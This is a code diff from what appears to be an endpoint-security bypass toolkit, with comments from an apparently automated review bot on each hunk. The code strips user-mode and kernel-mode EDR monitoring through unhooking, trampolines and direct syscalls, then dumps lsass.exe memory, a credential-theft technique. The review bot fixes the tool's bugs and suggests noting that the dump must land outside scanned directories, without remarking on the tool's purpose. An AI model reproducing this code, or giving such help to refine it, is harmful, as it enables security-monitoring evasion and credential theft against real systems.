Changed enum names in API
@@ -23,9 +23,9 @@ int main()
|
|||||||
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
|
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
|
||||||
printf("EDRSB_Init: %u", status);
|
printf("EDRSB_Init: %u", status);
|
||||||
}
|
}
|
||||||
Usermode_RemoveAllMonitoring(&ctx, Find_and_use_existing_trampoline);
|
Usermode_RemoveAllMonitoring(&ctx, EDRSB_UMTECH_Find_and_use_existing_trampoline);
|
||||||
Krnlmode_RemoveAllMonitoring(&ctx);
|
Krnlmode_RemoveAllMonitoring(&ctx);
|
||||||
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\no_scan\\tmp\\tmp.tmp", Find_and_use_existing_trampoline);
|
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\temp\\tmp.tmp", EDRSB_UMTECH_Find_and_use_existing_trampoline);
|
||||||
Krnlmode_RestoreAllMonitoring(&ctx);
|
Krnlmode_RestoreAllMonitoring(&ctx);
|
||||||
EDRSB_CleanUp(&ctx);
|
EDRSB_CleanUp(&ctx);
|
||||||
}
|
}
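Review bot: `if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS)` on the first line of the hunk assigns the result of the comparison to `status`, because `!=` binds tighter than `=`, so the `printf` reports 1 rather than the real EDRSB_STATUS, and since the block neither returns nor skips the calls that follow, execution continues into Usermode_RemoveAllMonitoring with a context whose initialization just failed. Parenthesize the assignment and bail out: `if ((status = EDRSB_Init(&ctx, &cfg)) != EDRSB_SUCCESS) {` / `printf("EDRSB_Init: %u\n", status);` / `return 1;`. The new dump path `C:\temp\tmp.tmp` is a fixed, predictable location for an LSASS dump; for a sample it is acceptable, but a comment such as `// example path: the dump must land outside any scanned/locked-down directory` would make the intent explicit. `main()` opens before the start of this hunk.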
|
||||||
|
|||||||
@@ -519,11 +519,11 @@ VOID Usermode_EnumAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx) {
|
|||||||
|
|
||||||
VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
|
VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
|
||||||
UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
|
UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
|
||||||
map_methods[Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
|
map_methods[EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
|
||||||
map_methods[Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
|
map_methods[EDRSB_UMTECH_Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
|
||||||
map_methods[Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
map_methods[EDRSB_UMTECH_Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
||||||
map_methods[Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
map_methods[EDRSB_UMTECH_Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
||||||
map_methods[Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
|
map_methods[EDRSB_UMTECH_Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
|
||||||
UNHOOK_METHOD unhook_method = map_methods[technique];
|
UNHOOK_METHOD unhook_method = map_methods[technique];
|
||||||
|
|
||||||
if (!ctx->foundUserlandHooks) {
|
if (!ctx->foundUserlandHooks) {
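Review bot: `UNHOOK_METHOD unhook_method = map_methods[technique];` indexes a 5-element stack array with a caller-supplied enum and no range check, so any value outside 0..4 (for example an integer cast from a configuration or command-line value) reads past the end of the array and hands an arbitrary UNHOOK_METHOD to the unhooking code below. Guard it before the lookup, `if ((unsigned)technique >= _countof(map_methods)) { return; }` (`_countof` is already used in what appears to be the same file, in Usermode_GetSafeNtFunc), and consider ending EDRSB_USERMODE_TECHNIQUE with a count enumerator so the hard-coded `5` and this bound are derived from one definition instead of being kept in sync by hand. The function body continues past the end of the hunk.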
|
||||||
@@ -552,17 +552,17 @@ EDRSB_STATUS _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(_In_ LPCSTR
|
|||||||
EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
|
EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
|
||||||
WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
|
WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
|
||||||
switch (technique) {
|
switch (technique) {
|
||||||
case Copy_ntdll_and_load:
|
case EDRSB_UMTECH_Copy_ntdll_and_load:
|
||||||
GetTempPathW(MAX_PATH, tempDLLFilePath);
|
GetTempPathW(MAX_PATH, tempDLLFilePath);
|
||||||
PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
|
PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
|
||||||
return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
|
return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
|
||||||
case Allocate_trampoline:
|
case EDRSB_UMTECH_Allocate_trampoline:
|
||||||
return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
|
return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
|
||||||
case Find_and_use_existing_trampoline:
|
case EDRSB_UMTECH_Find_and_use_existing_trampoline:
|
||||||
return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
|
return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
|
||||||
case Unhook_with_ntdll_NtProtectVirtualMemory:
|
case EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory:
|
||||||
return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
|
return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
|
||||||
case Use_direct_syscall:
|
case EDRSB_UMTECH_Use_direct_syscall:
|
||||||
*function = CreateSyscallStubWithVirtuallAlloc(functionName);
|
*function = CreateSyscallStubWithVirtuallAlloc(functionName);
|
||||||
if (*function) {
|
if (*function) {
|
||||||
return EDRSB_SUCCESS;
|
return EDRSB_SUCCESS;
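Review bot: In the `EDRSB_UMTECH_Copy_ntdll_and_load` case neither `GetTempPathW` (returns 0 on failure, or the required length when the buffer is too small) nor `PathCchCombine` (returns an HRESULT) is checked, so on failure `_Usermode_GetSafeNtFunction_with_ntdll_copy` is handed an empty or partial path and the error, if it surfaces at all, comes from the later copy or load. Check both before the call: `DWORD len = GetTempPathW(MAX_PATH, tempDLLFilePath);` / `if (len == 0 || len > MAX_PATH || FAILED(PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt")))` / return the EDRSB_STATUS error value the API uses for this kind of failure. Separately, the copy goes to a fixed, predictable name under %TEMP%, which the TODO already flags; if that file is subsequently mapped or loaded (not visible here), a pre-planted file at that path would be picked up, so the name should be randomized or the written copy verified before use. The switch continues past the end of the hunk.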
|
||||||
|
|||||||
@@ -32,11 +32,11 @@ typedef struct EDRSB_BYPASS_MODE_t {
|
|||||||
} EDRSB_BYPASS_MODE;
|
} EDRSB_BYPASS_MODE;
|
||||||
|
|
||||||
typedef enum EDRSB_USERMODE_TECHNIQUE_e {
|
typedef enum EDRSB_USERMODE_TECHNIQUE_e {
|
||||||
Unhook_with_ntdll_NtProtectVirtualMemory,
|
EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory,
|
||||||
Copy_ntdll_and_load,
|
EDRSB_UMTECH_Copy_ntdll_and_load,
|
||||||
Allocate_trampoline,
|
EDRSB_UMTECH_Allocate_trampoline,
|
||||||
Find_and_use_existing_trampoline,
|
EDRSB_UMTECH_Find_and_use_existing_trampoline,
|
||||||
Use_direct_syscall,
|
EDRSB_UMTECH_Use_direct_syscall,
|
||||||
} EDRSB_USERMODE_TECHNIQUE;
|
} EDRSB_USERMODE_TECHNIQUE;
|
||||||
|
|
||||||
// TODO: update values.
|
// TODO: update values.
|
||||||
|
|||||||